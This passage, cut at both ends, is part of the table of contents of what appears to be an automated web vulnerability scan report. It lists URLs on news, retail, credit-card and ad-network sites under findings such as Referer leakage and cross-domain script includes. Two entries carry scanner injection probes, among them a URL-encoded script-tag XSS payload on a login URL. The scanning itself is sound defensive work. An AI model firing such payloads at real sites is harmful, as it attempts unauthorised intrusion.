11.225. http://pix04.revsci.net/I10985/b3/0/3/1008211/759659174.js

11.226. http://pix04.revsci.net/I10985/b3/0/3/1008211/773834418.js

11.227. http://pix04.revsci.net/I10985/b3/0/3/1008211/778726069.js

11.228. http://pix04.revsci.net/I10985/b3/0/3/1008211/783069022.js

11.229. http://pix04.revsci.net/I10985/b3/0/3/1008211/791107298.js

11.230. http://pix04.revsci.net/I10985/b3/0/3/1008211/811937771.js

11.231. http://pix04.revsci.net/I10985/b3/0/3/1008211/812722846.js

11.232. http://pix04.revsci.net/I10985/b3/0/3/1008211/814191239.js

11.233. http://pix04.revsci.net/I10985/b3/0/3/1008211/821864121.js

11.234. http://pix04.revsci.net/I10985/b3/0/3/1008211/833474274.js

11.235. http://pix04.revsci.net/I10985/b3/0/3/1008211/837302366.js

11.236. http://pix04.revsci.net/I10985/b3/0/3/1008211/851863014.js

11.237. http://pix04.revsci.net/I10985/b3/0/3/1008211/85990292.js

11.238. http://pix04.revsci.net/I10985/b3/0/3/1008211/870883424.js

11.239. http://pix04.revsci.net/I10985/b3/0/3/1008211/8734315.js

11.240. http://pix04.revsci.net/I10985/b3/0/3/1008211/896562366.js

11.241. http://pix04.revsci.net/I10985/b3/0/3/1008211/91490024.js

11.242. http://pix04.revsci.net/I10985/b3/0/3/1008211/922092432.js

11.243. http://pix04.revsci.net/I10985/b3/0/3/1008211/927091024.js

11.244. http://pix04.revsci.net/I10985/b3/0/3/1008211/92794223.js

11.245. http://pix04.revsci.net/I10985/b3/0/3/1008211/944603151.js

11.246. http://pix04.revsci.net/I10985/b3/0/3/1008211/948985352.js

11.247. http://pix04.revsci.net/I10985/b3/0/3/1008211/959799423.js

11.248. http://pix04.revsci.net/I10985/b3/0/3/1008211/961894975.js

11.249. http://pix04.revsci.net/I10985/b3/0/3/1008211/97296821.js

11.250. http://pix04.revsci.net/I10985/b3/0/3/1008211/978202705.js

11.251. http://pixel.quantserve.com/pixel

11.252. http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif

11.253. http://pixel.quantserve.com/seg/p-9eJ8k4iSzux46.js

11.254. http://pixel.rubiconproject.com/di.php

11.255. http://pixel.rubiconproject.com/tap.php

11.256. http://pixel.rubiconproject.com/tap.php

11.257. http://pixel.rubiconproject.com/tap.php

11.258. http://r.turn.com/r/beacon

11.259. http://r.turn.com/server/pixel.htm

11.260. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=16893018/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.261. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=22319790/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.262. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=33615280/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.263. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=43472790/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.264. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=46970102/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.265. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=61218373/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.266. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=63221864/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.267. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=63734715/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.268. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=74200963/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.269. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=74864635/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.270. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=75388116/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.271. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=76474621/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.272. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=83985251/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.273. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=90208788/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.274. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=90827809/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.275. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=91953648/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.276. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=9352727/hr=12/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.277. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=12937368/hr=12/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.278. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=16141575/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.279. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=1625138/hr=12/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.280. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=27582677/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.281. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=28183863/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.282. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=3488355/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.283. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=42950117/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.284. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=45425146/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.285. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=54039788/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.286. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=58502192/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.287. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=63972603/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.288. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=66502577/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.289. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=77103321/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.290. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=83819639/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.291. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=83891309/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.292. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=84418946/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.293. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=93497556/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.294. http://r1-ads.ace.advertising.com/site=804480/size=300250/u=2/bnum=2746764/hr=7/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.295. http://r1-ads.ace.advertising.com/site=804480/size=300250/u=2/bnum=76077167/hr=7/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.296. http://r1-ads.ace.advertising.com/site=804481/size=728090/u=2/bnum=22657113/hr=8/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.297. http://r1-ads.ace.advertising.com/site=804481/size=728090/u=2/bnum=91341378/hr=8/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.298. http://rover.ebay.com/ar/1/76417/4

11.299. http://rover.ebay.com/ar/1/76418/4

11.300. http://rp.gwallet.com/r1/ucm

11.301. http://rs.gwallet.com/r1/pixel/x113

11.302. http://rs.gwallet.com/r1/pixel/x9r8101111

11.303. http://rs.gwallet.com/r1/pixel/x9r8962146

11.304. http://rt.legolas-media.com/lgrt

11.305. http://sales.liveperson.net/hc/55601019/

11.306. http://sales.liveperson.net/hc/55601019/

11.307. http://sales.liveperson.net/hc/55601019/

11.308. http://sales.liveperson.net/hc/57386690/

11.309. http://sales.liveperson.net/hc/57386690/

11.310. http://segment-pixel.invitemedia.com/pixel

11.311. http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6543418%22%20height=%221%22%20width=%221

11.312. http://services.krxd.net/geoip

11.313. http://services.krxd.net/pixel.gif

11.314. http://spotlight.creditcards.com/www/delivery/ajs.php

11.315. http://spotlight.creditcards.com/www/delivery/lg.php

11.316. http://sync.mathtag.com/sync

11.317. http://t2.trackalyzer.com/trackalyze.asp

11.318. http://tacoda.at.atwola.com/rtx/r.gif

11.319. http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf

11.320. http://tags.bluekai.com/site/2831

11.321. http://tags.bluekai.com/site/2939

11.322. http://tags.bluekai.com/site/3561

11.323. http://tags.bluekai.com/site/38

11.324. http://tags.bluekai.com/site/3834

11.325. http://tags.bluekai.com/site/450

11.326. http://tap.rubiconproject.com/oz/feeds/targus/profile

11.327. http://tap.rubiconproject.com/oz/sensor

11.328. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js

11.329. http://va.px.invitemedia.com/pixel

11.330. http://va.px.invitemedia.com/set_partner_uid

11.331. http://view.c3metrics.com/c3VTabstrct-6-2.php

11.332. http://www.bizographics.com/collect/

11.333. http://www.burstnet.com/enlightn/7644//AC95/

11.334. http://www.capitalone.com/creditcards/gateway/

11.335. http://www.cnbc.com/

11.336. http://www.cnbc.com/id/32372321

11.337. http://www.cnbc.com/id/43422860

11.338. http://www.cnbc.com/redirect.aspx

11.339. http://www.creditcards.com/css/credit-cards-print.css

11.340. http://www.creditcards.com/css/credit-cards.css

11.341. http://www.creditcards.com/images/404-footer-security-lock.gif

11.342. http://www.creditcards.com/images/Best-Credit-Cards.gif

11.343. http://www.creditcards.com/images/Credit-Cards-Compare.gif

11.344. http://www.creditcards.com/images/Credit-Cards-Instant-Approval.gif

11.345. http://www.creditcards.com/images/Credit-Cards-Search.gif

11.346. http://www.creditcards.com/images/accept-credit-cards.gif

11.347. http://www.creditcards.com/images/apply-credit-cards.gif

11.348. http://www.creditcards.com/images/apply-now.gif

11.349. http://www.creditcards.com/images/bank-credit-cards.gif

11.350. http://www.creditcards.com/images/blue-bg.gif

11.351. http://www.creditcards.com/images/cccom_logo_114x44.gif

11.352. http://www.creditcards.com/images/credit-card-news-and-advice.gif

11.353. http://www.creditcards.com/images/credit-card-offer-amex.gif

11.354. http://www.creditcards.com/images/credit-card-offer-discover.gif

11.355. http://www.creditcards.com/images/credit-card-offer-mastercard.gif

11.356. http://www.creditcards.com/images/credit-card-offer-visa.gif

11.357. http://www.creditcards.com/images/credit-card-offers.gif

11.358. http://www.creditcards.com/images/credit-card-tools.gif

11.359. http://www.creditcards.com/images/credit-cards-logo-2.gif

11.360. http://www.creditcards.com/images/fb-icon.png

11.361. http://www.creditcards.com/images/loading.gif

11.362. http://www.creditcards.com/images/menu.gif

11.363. http://www.creditcards.com/images/new-loading.gif

11.364. http://www.creditcards.com/images/rss-icon.png

11.365. http://www.creditcards.com/images/search-by-credit-quality.gif

11.366. http://www.creditcards.com/images/security-lock-dark.gif

11.367. http://www.creditcards.com/images/security-lock-light.gif

11.368. http://www.creditcards.com/images/spacer_light_blue.gif

11.369. http://www.creditcards.com/images/truste-seal-ctv.gif

11.370. http://www.creditcards.com/images/twtr-icon.png

11.371. http://www.creditcards.com/images/yt-icon.png

11.372. http://www.creditcards.com/javascript/application.js

11.373. http://www.creditcards.com/javascript/bluekai.js

11.374. http://www.creditcards.com/javascript/mvt/tooltip.js

11.375. http://www.creditcards.com/javascript/s_code.js

11.376. http://www.creditcards.com/javascript/thickbox/jquery.js

11.377. http://www.creditcards.com/javascript/thickbox/mvt/interstitial.css

11.378. http://www.creditcards.com/javascript/thickbox/mvt/interstitial.js

11.379. http://www.creditcards.com/javascript/thickbox/mvt/jquery.js

11.380. http://www.creditcards.com/javascript/thickbox/thickbox.css

11.381. http://www.creditcards.com/javascript/thickbox/thickbox.js

11.382. http://www.creditcards.com/javascript/tynt.js

11.383. http://www.creditcards.com/oc//%2522ns%253D%2522netsparker%25280x000132%2529)

11.384. http://www.creditcards.com/oc/Netsparker3643bc898af148cda9073d161734fcbb/

11.385. http://www.creditcards.com/oc/Netsparker8d82b62392124f8783667c0217ea8f35/

11.386. http://www.creditcards.com/oc/Netsparkera7c38b9ccc0c4920bb6a55a29b67ffb4/

11.387. http://www.creditcards.com/sb.php

11.388. http://www.homedepot.com/wcsstore/hdus/en_US/images/layout/cartdrpdwn_Checkout.png

11.389. http://www.homedepot.com/wcsstore/hdus/en_US/images/layout/orange_arrow.gif

11.390. http://www.homedepot.com/webapp/wcs/stores/servlet/ProductDisplay

11.391. http://www.wtp101.com/admeld_sync

12. Password field with autocomplete enabled

12.1. http://online.wsj.com/article/SB10001424052702303714704576384051388321740.html

12.2. http://online.wsj.com/article/SB10001424052702303714704576384051388321740.html

12.3. http://online.wsj.com/home-page

12.4. http://soundcloud.com/

12.5. http://soundcloud.com/help

12.6. http://soundcloud.com/help/premium-accounts

12.7. http://soundcloud.com/premium

12.8. https://soundcloud.com/login

12.9. https://soundcloud.com/login

12.10. https://soundcloud.com/login'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E

13. Source code disclosure

14. Referer-dependent response

14.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

14.2. http://ad.doubleclick.net/adi/N3175.8427.TRIBALFUSIONADNETWORK/B4640114.5

14.3. http://adnxs.revsci.net/imp

14.4. http://api-cdn.cnbc.com/api/chart/chart.asp

14.5. http://api.bizographics.com/v1/profile.json

14.6. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102761/PortalServe/

14.7. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102769/PortalServe/

14.8. http://pixel.adsafeprotected.com/jspix

14.9. http://view.c3metrics.com/c3VTabstrct-6-2.php

14.10. http://www.facebook.com/plugins/like.php

14.11. http://www.facebook.com/plugins/recommendations.php

14.12. http://www.facebook.com/widgets/recommendations.php

15. Cross-domain Referer leakage

15.1. http://a.rfihub.com/sed

15.2. http://a.tribalfusion.com/j.ad

15.3. http://a.tribalfusion.com/j.ad

15.4. http://a1.sndcdn.com/javascripts/base.js

15.5. http://ad.doubleclick.net/adi/N3175.8427.TRIBALFUSIONADNETWORK/B4640114.5

15.6. http://ad.doubleclick.net/adi/N3867.270604.B3/B5387288.7

15.7. http://ad.doubleclick.net/adi/N553.specificmedia.com/B4970757.3

15.8. http://ad.doubleclick.net/adi/N553.specificmedia.com/B4970757.4

15.9. http://ad.doubleclick.net/adi/N5823.RealMedia/B5598690.4

15.10. http://ad.doubleclick.net/adi/N5823.RealMedia/B5598690.8

15.11. http://ad.doubleclick.net/adi/N5823.RealMedia/B5598690.8

15.12. http://ad.doubleclick.net/adi/N5823.RealMedia/B5598690.8

15.13. http://ad.doubleclick.net/adi/brokerbuttons.wsj.com/us_subscriber

15.14. http://ad.doubleclick.net/adi/brokerbuttons.wsj.com/us_subscriber

15.15. http://ad.doubleclick.net/adi/brokerbuttons.wsj.com/us_subscriber

15.16. http://ad.doubleclick.net/adi/brokerbuttons.wsj.com/us_subscriber

15.17. http://ad.doubleclick.net/adi/brokerbuttons.wsj.com/us_subscriber

15.18. http://ad.doubleclick.net/adi/interactive.wsj.com/forgotpassword

15.19. http://ad.doubleclick.net/adi/interactive.wsj.com/front_nonsub

15.20. http://ad.doubleclick.net/adi/interactive.wsj.com/front_nonsub

15.21. http://ad.doubleclick.net/adi/interactive.wsj.com/front_nonsub

15.22. http://ad.doubleclick.net/adi/interactive.wsj.com/front_nonsub

15.23. http://ad.doubleclick.net/adi/interactive.wsj.com/front_nonsub

15.24. http://ad.doubleclick.net/adi/interactive.wsj.com/slideshow

15.25. http://ad.doubleclick.net/adj/N4538.126262.AOLPERFORMANCENETWO/B2304017.5

15.26. http://ad.doubleclick.net/adj/N4538.126262.AOLPERFORMANCENETWO/B2304017.6

15.27. http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus

15.28. http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus

15.29. http://ad.doubleclick.net/adj/nbcu.cnbc/news_us

15.30. http://ad.doubleclick.net/adj/nbcu.cnbc/news_us

15.31. http://ad.doubleclick.net/adj/nbcu.cnbc/news_us

15.32. http://ad.doubleclick.net/adj/nbcu.cnbc/search

15.33. http://admeld.adnxs.com/usersync

15.34. http://ads.bluelithium.com/st

15.35. http://afe.specificclick.net/serve/v=5

15.36. http://afe.specificclick.net/serve/v=5

15.37. http://cas.criteo.com/delivery/afr.php

15.38. http://clickserve.cc-dt.com/link/click

15.39. http://clickserve.cc-dt.com/link/click

15.40. http://clickserve.cc-dt.com/link/click

15.41. http://clickserve.cc-dt.com/link/click

15.42. http://clickserve.cc-dt.com/link/tplclick

15.43. http://cm.g.doubleclick.net/pixel

15.44. http://cm.g.doubleclick.net/pixel

15.45. http://cm.g.doubleclick.net/pixel

15.46. http://creditcards.citicards.com/usc/Dividend/May2011/Q2/12mo/100cash/default.htm

15.47. http://creditcards.citicards.com/usc/platinum/MC/external/affiliate/Mar2011/default.htm

15.48. http://creditcards.citicards.com/usc/platinum/Visa/external/affiliate/Mar2011/default.htm

15.49. http://creditcards.citicards.com/usc/thankyou/Preferred/external/May2011/50GC/default.htm

15.50. http://creditcards.citicards.com/usc/value/diamond_preferred/MAr2011pricing/external/default.htm

15.51. http://fls.doubleclick.net/activityi

15.52. http://gan.doubleclick.net/gan_click

15.53. http://gan.doubleclick.net/gan_click

15.54. http://gan.doubleclick.net/gan_click

15.55. http://gan.doubleclick.net/gan_click

15.56. http://gan.doubleclick.net/gan_click

15.57. http://gan.doubleclick.net/gan_click

15.58. http://gan.doubleclick.net/gan_click

15.59. http://gan.doubleclick.net/gan_click

15.60. http://gan.doubleclick.net/gan_impression

15.61. http://ib.adnxs.com/ptj

15.62. http://img.mediaplex.com/content/0/14302/119028/Selector_300x250.js

15.63. http://img.mediaplex.com/content/0/17985/125897/728x90_Mits_Res_060111.js

15.64. http://img.mediaplex.com/content/0/711/126780/82996_US_2011_Q2_Fathers_Day_Default_300x250.js

15.65. http://img.mediaplex.com/content/0/711/126780/82997_US_2011_Q2_Fathers_Day_Default_728x90.js

15.66. http://online.wsj.com/article/SB10001424052702303714704576384051388321740.html

15.67. http://optimized-by.rubiconproject.com/a/dk.html

15.68. http://pbid.pro-market.net/engine

15.69. http://pixel.invitemedia.com/admeld_sync

15.70. http://pixel.invitemedia.com/admeld_sync

15.71. http://platform.twitter.com/widgets/follow_button.html

15.72. http://reviews.homedepot.com/1999q/202642971/reviews.htm

15.73. http://reviews.homedepot.com/1999s/202642971/reviews.htm

15.74. http://rs.gwallet.com/r1/pixel/x113

15.75. http://search.cnbc.com/main.do

15.76. https://services.wsj.com/Gryphon/jsp/retentionController.jsp

15.77. https://soundcloud.com/login

15.78. http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf

15.79. http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf

15.80. http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf

15.81. http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf

15.82. http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf

15.83. http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf

15.84. http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf

15.85. http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf

15.86. http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf

15.87. http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf

15.88. http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf

15.89. http://tags.bluekai.com/site/2939

15.90. http://tags.bluekai.com/site/2939

15.91. http://tags.bluekai.com/site/2939

15.92. http://tags.bluekai.com/site/2939

15.93. http://ticker.cnbc.com/scripts/cnbc_ticker.js

15.94. http://www.capitalone.com/creditcards/venture-one-rewards-credit-card/11858/15/

15.95. http://www.cnbc.com/js/cnbc_quote_components.js

15.96. http://www.creditcards.com/oc/

15.97. http://www.facebook.com/plugins/like.php

15.98. http://www.facebook.com/plugins/like.php

15.99. http://www.facebook.com/plugins/recommendations.php

15.100. http://www.facebook.com/plugins/recommendations.php

15.101. http://www.facebook.com/plugins/recommendations.php

15.102. http://www.facebook.com/plugins/recommendations.php

15.103. http://www.facebook.com/widgets/recommendations.php

15.104. http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation

15.105. http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation

15.106. http://www.homedepot.com/webapp/wcs/stores/servlet/Navigation

15.107. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderCalculate

15.108. http://www.homedepot.com/webapp/wcs/stores/servlet/ProductDisplay

15.109. http://www.lightsquared.com/wp-content/themes/lightsquared/js/lightsquared.js

15.110. http://www.nutter.com/attorneys.php

16. Cross-domain script include

16.1. http://a.rfihub.com/sed

16.2. http://a.tribalfusion.com/p.media/aMmOQKodaOYETw3t3HQcrF2AFImWAoVW39XFbb1UBiXTamRrJFUFv5Vt3YobQpQbZbp1qUy5Tfg5Ej0oTbBXbJcTdjTn6UBnVrrmHUJ3TFl5teN5ABFmbbIXcM0YGZb21VvxmEFV2Fn2Vb7HWAU4PqMQSsMsQHbuYHBqVAvp4r3kdkZcL1d/2546166/adTag.html

16.3. http://ad.doubleclick.net/adi/N3867.270604.B3/B5387288.7

16.4. http://ad.doubleclick.net/adi/N553.specificmedia.com/B4970757.3

16.5. http://ad.doubleclick.net/adi/N553.specificmedia.com/B4970757.4

16.6. http://afe.specificclick.net/serve/v=5

16.7. http://afe.specificclick.net/serve/v=5

16.8. http://cas.criteo.com/delivery/afr.php

16.9. http://cdn5.tribalfusion.com/media/1956006/frame.html

16.10. http://cdn5.tribalfusion.com/media/2516896//frm.html

16.11. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1061037567@x15

16.12. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1071006765@x15

16.13. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1584817229@x15

16.14. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1662691403@x15

16.15. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1837611586@x15

16.16. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1873985195@x15

16.17. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1938155974@x15

16.18. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1046746257@Top1

16.19. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1187700357@Top1

16.20. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1236153237@Top1

16.21. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1359015114@Top1

16.22. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1397195672@Top1

16.23. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1515366038@Top1

16.24. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1520590272@Top1

16.25. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1737549536@Top1

16.26. http://online.wsj.com/home-page

16.27. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=33615280/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

